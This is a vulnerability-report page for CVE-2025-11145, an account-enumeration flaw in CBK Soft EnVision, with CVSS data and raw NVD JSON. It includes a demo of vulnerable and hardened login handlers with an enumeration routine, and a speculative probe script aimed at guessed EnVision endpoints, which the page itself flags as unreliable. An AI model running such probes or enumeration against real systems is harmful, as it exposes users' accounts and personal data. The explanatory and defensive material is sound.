Security Vulnerability Report

CVE-2025-11145

Published: 2025-10-24 15:15:38
Last Modified: 2026-04-15 00:35:42

Description

Observable Discrepancy, Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Private Personal Information to an Unauthorized Actor vulnerability in CBK Soft Software Hardware Electronic Computer Systems Industry and Trade Inc. EnVision allows Account Footprinting. This issue affects enVision: before 250566.

In plain terms: the assigned weaknesses are CWE-203 (observable discrepancy), CWE-200 and CWE-359, and the CVSS vector records an unauthenticated remote attacker (AV:N, PR:N, UI:N) with high confidentiality impact and no integrity or availability impact. Account footprinting means the application answers differently depending on whether a given account exists, so an attacker with no credentials can enumerate valid accounts by submitting guesses and comparing the responses; the CWE-359 classification indicates that private personal information is exposed along the way. The advisory does not say which request or response exhibits the discrepancy; the only concrete detail published is the fixed build, 250566.
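To make the CWE-203 pattern concrete, here is an added, self-contained illustration that is not EnVision's code and is not taken from the advisory: a login handler whose error messages differ for unknown users and wrong passwords, a hardened handler that returns one uniform response and does the same password-hash work for both cases, and a footprinting routine that shows enumeration succeeding against the first and failing against the second. The user store, salt and credentials are constructed demo data.

```python
from __future__ import annotations

import hashlib
import hmac
import secrets

# Constructed demo user store (not EnVision data): username -> PBKDF2 hash.
_SALT = b"demo-salt-0001"
_ITERATIONS = 10_000  # kept low so the demo runs quickly; use far more in production


def _hash(password: str, salt: bytes = _SALT) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


USERS = {
    "alice": _hash("correct horse battery staple"),
    "bob": _hash("hunter2"),
}

# Dummy hash so the hardened handler performs a comparison for unknown users too,
# which keeps the timing of the two failure paths the same.
_DUMMY_HASH = _hash(secrets.token_hex(16))


def login_vulnerable(username: str, password: str) -> tuple[int, str]:
    """Observable discrepancy: status code and message reveal whether the account exists."""
    stored = USERS.get(username)
    if stored is None:
        return 404, "No account with that username"
    if not hmac.compare_digest(stored, _hash(password)):
        return 401, "Incorrect password"
    return 200, "Welcome"


def login_hardened(username: str, password: str) -> tuple[int, str]:
    """Uniform failure response; hashing and comparison always run regardless of the user."""
    stored = USERS.get(username, _DUMMY_HASH)
    matched = hmac.compare_digest(stored, _hash(password))
    if matched and username in USERS:
        return 200, "Welcome"
    return 401, "Invalid username or password"


def footprint(handler, candidates: list[str], junk_password: str = "x") -> list[str]:
    """Account footprinting: submit a throwaway password for each candidate username
    and flag every candidate whose response differs from a known non-existent user."""
    baseline = handler("no-such-user-" + secrets.token_hex(4), junk_password)
    return [u for u in candidates if handler(u, junk_password) != baseline]


if __name__ == "__main__":
    guesses = ["alice", "bob", "carol"]
    print("vulnerable handler leaks:", footprint(login_vulnerable, guesses))
    print("hardened handler leaks:  ", footprint(login_hardened, guesses))
```

The hardened handler removes the message and status discrepancy, and by hashing against a dummy value for unknown users it also avoids the timing discrepancy that would otherwise remain (a lookup miss returning early is much faster than a PBKDF2 computation). Rate limiting per source and per target account is still needed, because a uniform response does not stop credential guessing itself.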

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is published for this entry. The only affected-version statement comes from the advisory text: EnVision builds before 250566 are affected, so 250566 should be treated as the first fixed build.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic probe script: the endpoint paths and the keyword heuristic are guesses that the advisory does not confirm, and a 200 response containing a word such as "user" is not evidence of the vulnerability. It also does not exercise the observable-discrepancy behaviour (a different response for existing and non-existing accounts) that CWE-203 describes, so a negative result proves nothing either.
python
# CVE-2025-11145 PoC - CBK Soft EnVision Account Footprinting
# This PoC demonstrates the information disclosure vulnerability.
# Caveat: the endpoint list and keyword check below are not taken from the
# advisory; they are speculative and will produce false positives on any
# page that happens to mention accounts or users.
import requests

TARGET_URL = "http://target-envision-system.com"
CVE_ID = "CVE-2025-11145"


def check_vulnerability(target):
    """
    Check if the target EnVision system is vulnerable to CVE-2025-11145
    """
    # Common EnVision endpoints that may expose account information (guesses)
    endpoints = [
        "/api/account/info",
        "/api/user/profile",
        "/api/accounts/list",
        "/admin/userdetails",
    ]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "application/json",
    }

    print(f"[*] Testing {CVE_ID} on {target}")

    for endpoint in endpoints:
        try:
            url = f"{target}{endpoint}"
            # verify=False skips TLS verification; only acceptable on a lab target.
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            # Check if sensitive information is exposed
            if response.status_code == 200:
                # Look for account-related sensitive data (weak keyword heuristic)
                keywords = ["account", "user", "email", "password", "phone", "address"]
                if any(keyword in response.text.lower() for keyword in keywords):
                    print(f"[!] Potential vulnerability found at {endpoint}")
                    print(f"[+] Response snippet: {response.text[:500]}")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    print("[*] No obvious vulnerability indicators found")
    return False


if __name__ == "__main__":
    check_vulnerability(TARGET_URL)
    print("\n[*] Note: This is a demonstration PoC. Verify with official sources.")

References

https://www.usom.gov.tr/bildirim/tr-25-0361 (USOM advisory TR-25-0361, the sole reference recorded for this entry)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11145",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-24T15:15:37.783",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Observable Discrepancy, Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Private Personal Information to an Unauthorized Actor vulnerability in CBK Soft Software Hardware Electronic Computer Systems Industry and Trade Inc. EnVision allows Account Footprinting.This issue affects enVision: before 250566."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"},
          {"lang": "en", "value": "CWE-203"},
          {"lang": "en", "value": "CWE-359"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0361",
        "source": "[email protected]"
      }
    ]
  }
}